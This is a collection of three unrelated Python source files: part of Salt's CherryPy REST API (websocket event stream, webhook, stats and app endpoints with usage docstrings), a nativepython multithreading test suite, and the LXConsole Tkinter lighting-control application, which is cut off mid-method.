Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
multithreading_test.py
|
# Copyright 2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typed_python import *
import typed_python._types as _types
from nativepython.runtime import Runtime
import unittest
import time
import threading
import os
def thread_apply(f, argtuples):
threads = []
results = {}
def doit(f, ix, *args):
results[ix] = f(*args)
for ix, a in enumerate(argtuples):
threads.append(threading.Thread(target=doit, args=(f, ix) + a))
for t in threads:
t.start()
for t in threads:
t.join()
return [results.get(i) for i in range(len(argtuples))]
def Compiled(f):
f = Function(f)
return Runtime.singleton().compile(f)
class AClass(Class):
x = Member(int)
class TestMultithreading(unittest.TestCase):
def test_gil_is_released(self):
@Compiled
def f(x: int):
res = 0.0
for i in range(x):
res += i
return res
ratios = []
for _1 in range(10):
t0 = time.time()
thread_apply(f, [(100000000,)])
t1 = time.time()
thread_apply(f, [(100000000,), (100000001,)])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we may be running in a multitenant environment
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .8 and ratio < 1.75, ratio)
else:
self.assertTrue(ratio >= .9 and ratio < 1.1, ratio)
def test_refcounts_of_objects_across_boundary(self):
class Object:
pass
_ = Object()
A = Alternative("A", X={'x': int}, Y={'y': int})
for instance in [
TupleOf(int)((1, 2, 3)),
ListOf(int)((1, 2, 3)),
# Dict(int,int)({1:2,3:4}),
ConstDict(int, int)({1: 2, 3: 4}),
AClass(),
# anObject,
A.X(x=10)
]:
self.refcountsTest(instance)
def refcountsTest(self, instance):
typeOfInstance = type(instance)
@Compiled
def rapidlyIncAndDecref(x: typeOfInstance):
_ = x
for _1 in range(1000000):
_ = x
return x
thread_apply(rapidlyIncAndDecref, [(instance,)] * 10)
self.assertEqual(_types.refcount(instance), 1)
def test_serialize_is_parallel(self):
x = ListOf(int)()
x.resize(1000000)
sc = SerializationContext({})
def f():
for i in range(10):
sc.deserialize(sc.serialize(x))
ratios = []
for i in range(10):
t0 = time.time()
thread_apply(f, [()])
t1 = time.time()
thread_apply(f, [(), ()])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we don't really get two cores
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .8 and ratio < 1.75, ratios)
else:
self.assertTrue(ratio >= .8 and ratio < 1.2, ratios)
|
lxconsole.py
|
#!/usr/bin/python
# lxconsole.py
#
# by Claude Heintz
# copyright 2014-15 by Claude Heintz Design
#
# see license included with this distribution or
# https://www.claudeheintzdesign.com/lx/opensource.html
#################################################################
#
# This file contains the main interface for a simple lighting control application
# The user interface is provided through Tkinter
# if Tkinter is not installed, on linux use: sudo apt-get install python-tk
# refer to READ ME.txt for configursation information
#
#################################################################
try:
from Tkinter import *
import tkFileDialog as tkfile_dialog
import tkMessageBox as tkmsg_box
# python2 imports
except:
from tkinter import *
import tkinter.filedialog as tkfile_dialog
import tkinter.messagebox as tkmsg_box
#python3 imports
from CTProperties import CTProperties
from LXChannelDisplay import LXChannelDisplay
from LXCues import LXCues
from LXCues import LXLiveCue
from LXCuesAsciiParser import LXCuesAsciiParser
from OSCListener import OSCListener
import time
import threading
import os
class App:
def __init__(self, master):
self.boss = master
master.title('LXConsole')
master.bind('<Return>', self.read_cmd)
#read application options
self.props = CTProperties()
cpath = os.path.realpath(__file__)
self.pylxdir = os.path.dirname(cpath)
self.props.parseFile( self.pylxdir + "/lxconsole.properties")
chans = self.props.intForKey("channels", 300)
dims = self.props.intForKey("dimmers", 512)
#create cues
self.cues = LXCues(chans, dims)
self.cues.delegate = self
self.update_thread = None
self.updating = False
self.path = ""
self.lastcomplete = None
self.back = None
self.oscin = None
#setup output interface
use_interface = self.props.stringForKey("interface", "")
if use_interface == "widget":
self.set_usb_out()
else:
self.set_artnet_out()
self.oscport = int(self.props.stringForKey("oscport", "7688"))
self.echo_osc_ip = self.props.stringForKey("echo_osc_ip", "none")
self.echo_osc_port = int(self.props.stringForKey("echo_osc_port", "9000"))
#create main tk frame
f = Frame(master, height=500, width=580)
f.pack()
f.pack_propagate(0)
#create left frame
lf = Frame(f)
# create channel display
self.chandisp = LXChannelDisplay(lf,self.cues.channels, 10)
# create command field
self.e = Entry(lf)
self.e.pack(fill=X, side=BOTTOM)
self.e.bind("<Key>", self.key)
lf.pack(side=LEFT)
#create right frame
rf = Frame(f, height=500, width=250)
rf.pack(side=RIGHT)
rf.pack_propagate(0)
# create current cue label
self.cqt = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqt.pack(fill=X, side=TOP)
# create current cue up label
self.cqup = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqup.pack(fill=X, side=TOP)
# create current cue down label
self.cqdn = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqdn.pack(fill=X, side=TOP)
# create current cue follow label
self.cqf = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqf.pack(fill=X, side=TOP)
# create go button
cf = Frame(rf)
self.gb = Button(cf, text="Go", width=10, command=self.go_cmd)
self.gb.pack(side=BOTTOM)
self.sb = Button(cf, text="Stop", width=10, command=self.stop_cmd)
self.sb.pack(side=BOTTOM)
self.sb = Button(cf, text="Back", width=10, command=self.back_cmd)
self.sb.pack(side=BOTTOM)
cf.pack(side=LEFT)
# create next cue label and pack the gf frame
self.nx = Label(rf, width=5)
self.nx.pack(side=LEFT)
# create master fader
pf = Frame(rf, width=20)
pf.pack(side=RIGHT)
self.mfader = Scale(rf, from_=100, to=0, showvalue=0)
self.mfader.set(100)
self.mfader.config(command=self.scroll_change)
self.mfader.pack(side=RIGHT)
# create a menu
menubar=Menu(master)
filemenu=Menu(menubar, tearoff=0)
filemenu.add_command(label='Open',command=self.menuOpen)
filemenu.add_command(label='Save',command=self.menuSave)
filemenu.add_command(label='Exit', command=self.menuQuit)
menubar.add_cascade(label='File', menu=filemenu)
self.oscIN = BooleanVar()
livemenu=Menu(menubar, tearoff=0)
livemenu.add_checkbutton(label="OSC", onvalue=True, offvalue=False, variable=self.oscIN, command=self.menuOSC)
livemenu.add_command(label='Set Output to USB', command=self.menu_set_usb_out)
livemenu.add_command(label='Set Output to Art-Net', command=self.menu_set_artnet_out)
menubar.add_cascade(label='Live', menu=livemenu)
helpmenu=Menu(menubar, tearoff=0)
helpmenu.add_command(label='About', command=self.menuAbout)
helpmenu.add_command(label='Quick Help', command=self.menuQuickHelp)
menubar.add_cascade(label='Help', menu=helpmenu)
master.config(menu=menubar)
self.e.focus_set()
#########################################
#
# menu methods handle setting the output interface
#
#########################################
def set_usb_out(self):
if self.cues.livecue.output != None:
self.cues.livecue.output.close()
try:
from DMXUSBPro import DMXUSBProInterface
serial_port = self.props.stringForKey("widget", "")
iface = DMXUSBProInterface(serial_port)
self.cues.livecue.output = iface
iface.startSending()
except:
tkmsg_box.showinfo("Error Connecting", sys.exc_info()[0])
def set_artnet_out(self):
from ArtNet import ArtNetInterface
if self.cues.livecue.output != None:
self.cues.livecue.output.close()
ip = self.props.stringForKey("artip", "10.255.255.255")
iface = ArtNetInterface(ip)
self.cues.livecue.output = iface
iface.startSending()
#########################################
#
# menu methods handle the menu commands
#
#########################################
def menuOpen(self):
filename = tkfile_dialog.askopenfilename(filetypes=[('ASCII files','*.asc')])
if len(filename) > 0:
p = LXCuesAsciiParser(self.cues.channels, self.cues.livecue.patch.addresses, self.cues.livecue.output)
message = p.parseFile(filename)
if p.success:
self.cues = p.cues
self.cues.next = None
self.lastcomplete = None
self.back = None
self.path = filename
tkmsg_box.showinfo(message='Open',detail=message,icon='info',title='Open')
self.boss.title(os.path.basename(self.path))
self.updateCurrent()
def menuSave(self):
if len(self.path) > 0:
filename = tkfile_dialog.asksaveasfilename(defaultextension="asc", initialfile=os.path.basename(self.path), initialdir=os.path.dirname(self.path))
else:
filename = tkfile_dialog.asksaveasfilename(defaultextension="asc")
if len(filename) > 0:
f = open(filename, 'w')
f.write(self.cues.asciiString())
f.close()
def menuQuit(self):
if tkmsg_box.askokcancel("Quit", "Do you really wish to quit?"):
if self.oscin != None:
self.oscin.stopListening()
sys.exit()
def menu_set_usb_out(self):
if tkmsg_box.askokcancel("USB", "Set USB DMX Pro as output interface?"):
self.set_usb_out()
def menu_set_artnet_out(self):
if tkmsg_box.askokcancel("Art-Net", "Set Art-Net as output interface?"):
self.set_artnet_out()
def menuOSC(self):
if self.oscin == None:
self.oscin = OSCListener()
self.oscin.startListening(self.oscport, self.cues)
else:
self.oscin.stopListening()
self.oscin = None
def menuAbout(self):
tkmsg_box.showinfo(message='LXConsole|Python v 0.8',detail='build 4026\nCopyright 2015-2018 Claude Heintz Design\nSee source files for license info.',icon='info',title='About LXConsole')
def menuQuickHelp(self):
f = open(self.pylxdir + '/quickhelp.txt', 'r')
message = f.read()
f.close()
self.displayMessage(message, 'Quick Help')
#########################################
#
# go and stop
#
# go_cmd is initiated by the Go Button
# stop_cmd is called by pressing the esc key
#
#########################################
def go_cmd(self):
self.cues.delegate = self
self.cues.startFadingToCue(self.cues.next)
def stop_cmd(self):
self.cues.livecue.stopped = True
if self.cues.livecue.fading:
self.cues.livecue.followtime = -1
self.cues.livecue.stopFading()
def back_cmd(self):
if self.back != None:
self.cues.delegate = self
self.cues.startFadingToCue(self.back)
#########################################
#
# fade callbacks to the fade delegate are called by the fading thread
#
#########################################
def fadeStarted(self):
self.cqup.config(text="Fading: " + self.cues.livecue.titleString())
self.cqdn.config(text="")
self.cqf.config(text=self.cues.livecue.followTimeString())
self.back = self.lastcomplete
def fadeProgress(self):
self.updateDisplayAsynch()
def fadeComplete(self):
if self.cues.livecue.stopped == False:
self.lastcomplete = self.cues.current
self.updateDisplay()
self.updateCurrent()
#########################################
#
# display updates
# can happen on a separate thread to allow the fade thread
# not to have to wait for the user interface
#
#########################################
def updateAsynch(self):
while (self.updating):
self.updating = False
self.updateDisplay()
time.sleep(0.1) #max update every 10th of a second
self.update_thread = None
def updateDisplayAsynch(self):
self.updating = True;
if self.update_thread is None:
self.update_thread = threading.Thread(target=self.updateAsynch)
self.update_thread.daemon = True
self.update_thread.start()
def updateDisplay(self):
self.cues.updateDisplay(self.chandisp)
root.update_idletasks()
def updateOutput(self):
self.cues.updateDisplay(self.chandisp)
self.cues.livecue.writeToInterface()
def updateCurrent(self):
if self.cues.current != None:
self.cqt.config(text=self.cues.current.titleString())
self.cqup.config(text=self.cues.current.upTimeString())
self.cqdn.config(text=self.cues.current.downTimeString())
self.cqf.config(text=self.cues.current.followTimeString())
else:
self.cqt.config(text="")
self.cqup.config(text="")
self.cqdn.config(text="")
self.cqf.config(text="")
if self.cues.next != None:
self.nx.config(text=str(self.cues.next.number))
else:
self.nx.config(text="")
#########################################
#
# display message opens a window to display some text
#
#########################################
def displayMessage(self, message, title="Message"):
auxmaster = Tk()
auxmaster.title(title)
frame = Frame(auxmaster, height=530, width=530)
frame.pack()
frame.pack_propagate(0)
scrollbar = Scrollbar(frame)
scrollbar.pack(side=RIGHT, fill=Y)
l = Text(frame, yscrollcommand=scrollbar.set)
l.pack(side=LEFT, fill=BOTH)
l.insert(INSERT,message)
scrollbar.config(command=l.yview)
def displayPatch(self):
self.displayMessage(self.cues.livecue.patch.patchString(), "Patch")
def displayCues(self):
self.displayMessage(self.cues.descriptionString(), "Cues")
def displayOSC(self):
self.displayMessage(self.cues.oscString(), "OSC")
def displayDimmerOptions(self):
self.displayMessage(self.cues.livecue.patch.optionString(), "Dimmer Options")
#########################################
#
# The channel display only shows a certain number of channels
# at a time.
#
#########################################
def displayNextPage(self):
self.chandisp.nextPage()
self.updateDisplay()
def displayPrevPage(self):
self.chandisp.prevPage()
self.updateDisplay()
#########################################
#
# This is called by a change in the master fader
#
#########################################
def scroll_change(self, event):
self.cues.setMasterLevel(float(self.mfader.get()))
self.updateOutput()
#########################################
#
# This is called when a key is pressed in the command line
#
#########################################
def key(self, event):
self.external_key(event.char)
return "break"
#########################################
#
# This method takes a key press and interprets it based on context,
# expanding it if it begins or ends a command
# or substituting such as 'a' becoming '@'
#
#########################################
def external_key(self, k):
if len(k) == 0:
return
if k == "enter":
self.read_cmd(None)
elif ord(k) == 13:
self.read_cmd(None)
elif ord(k) == 127:
self.e.delete(len(self.e.get())-1,END)
elif ord(k) == 8:
self.e.delete(len(self.e.get())-1,END)
elif k == "clear":
self.e.delete(0, END)
elif k == "-":
self.e.insert(END, ' ')
elif k == "@":
self.e.insert(END, '@')
elif k == "a":
self.e.insert(END, '@')
elif k == "f":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '100')
else:
self.e.insert(END, '@100')
self.read_cmd(None)
elif k == "x":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '0')
else:
self.e.insert(END, '@0')
self.read_cmd(None)
elif k == "z":
ce = self.e.get()
if len(ce) > 0:
if ce.endswith('@'):
self.e.insert(END, '0')
else:
self.e.insert(END, '@0')
self.read_cmd(None)
elif k == "t":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'time ')
else:
if ce.startswith('time') or ce.startswith('cue') or ce.startswith('rec'):
self.e.insert(END, ' ')
else:
self.e.insert(END, '>')
elif k == "r":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'record ')
elif k == "q":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'cue ')
elif k == "k":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'delete cue ')
elif k == "p":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'patch ')
elif k == "P":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'dimmer_option ')
elif k == "o":
ce = self.e.get()
if len(ce) == 0:
self.e.insert(END, 'osc ')
elif k == "]":
ce = self.e.get()
if len(ce) == 0:
self.displayNextPage()
self.e.delete(0, END)
elif k == "[":
ce = self.e.get()
if len(ce) == 0:
self.displayPrevPage()
self.e.delete(0, END)
else:
self.e.insert(END, k)
if k.isdigit():
ce = self.e.get()
ai = ce.find('@')
if ai > 0 and ai == (len(ce)-3):
self.read_cmd(None)
if self.echo_osc_ip != "none":
self.cues.oscinterface.sendOSCstring(self.echo_osc_ip,self.echo_osc_port, "/1/cmdline", self.e.get())
#########################################
#
# This is called to read the command line and process its contents
#
#########################################
def read_cmd(self, event):
self.process_cmd(self.e.get())
#########################################
#
# This is the method that interprets commands entered in the command field
# The command string is split into tokens separated by a space
# the first token determines how the command is interpreted
# except in the case where the command line contains '@'
#
#########################################
def process_cmd(self, n):
cp = n.split("@")
if len(cp) == 2:
self.process_at_cmd(cp[0], cp[1])
self.e.delete(0,END)
return
cp = n.split(" ")
self.e.delete(0,END)
if n.startswith("rec"):
self.process_rec_cmd(n, cp)
elif n.startswith("tim"):
self.process_time_cmd(cp)
elif n.startswith("pat"):
self.process_patch_cmd(cp)
elif n.startswith("dim"):
self.process_dimmer_cmd(cp)
elif n.startswith("cue"):
self.process_cue_cmd(n, cp)
elif n.startswith("delete cue"):
self.process_delete_cue_cmd(cp)
elif n.startswith("osc"):
self.process_osc_cmd(cp)
#########################################
#
# This is called when the command line contains "@"
#
#########################################
def process_at_cmd(self, n, lp):
cp = n.split(">")
if len(cp) == 1:
cp = n.split(",")
if len(cp) == 1:
self.cues.livecue.setNewLevel(cp[0], lp)
else:
for i in range(0, len(cp)):
self.cues.livecue.setNewLevel(cp[i], lp)
elif len(cp) == 2:
for i in range(int(cp[0]), int(cp[1])+1):
self.cues.livecue.setNewLevel(i, lp)
self.updateDisplay()
#########################################
#
# This is called when the command line starts with "rec"
#
#########################################
def process_rec_cmd(self, n, cp):
if len(cp) >= 2:
if len(cp[1]) > 0:
recorded = self.cues.recordCueFromLive(float(cp[1]))
else:
recorded = self.cues.recordCueFromLive()
if recorded == False:
shouldreplace = tkmsg_box.askyesno("Cue Exists!", "Replace?")
if shouldreplace == True:
if len(cp) == 2:
recorded = self.cues.recordCueFromLive(float(cp[1]), 1)
else:
recorded = self.cues.recordCueFromLive(0,1)
if recorded == True and len(cp) > 2:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
nn = 'time ' + n[8+len(cp[1]):]
self.process_cmd(nn)
self.updateCurrent()
#########################################
#
# This is called when the command line starts with "tim"
#
#########################################
def process_time_cmd(self, cp):
if self.cues.current != None:
if len(cp) == 2 and len(cp[1]) > 0:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[1])
self.updateCurrent()
elif len(cp) == 3:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[2])
self.updateCurrent()
elif len(cp) == 4:
self.cues.current.uptime = float(cp[1])
self.cues.current.downtime = float(cp[2])
self.cues.current.followtime = float(cp[3])
self.updateCurrent()
elif len(cp) == 5:
self.cues.current.uptime = float(cp[1])
self.cues.current.waituptime = float(cp[2])
self.cues.current.downtime = float(cp[3])
self.cues.current.waitdowntime = float(cp[4])
self.updateCurrent()
elif len(cp) == 6:
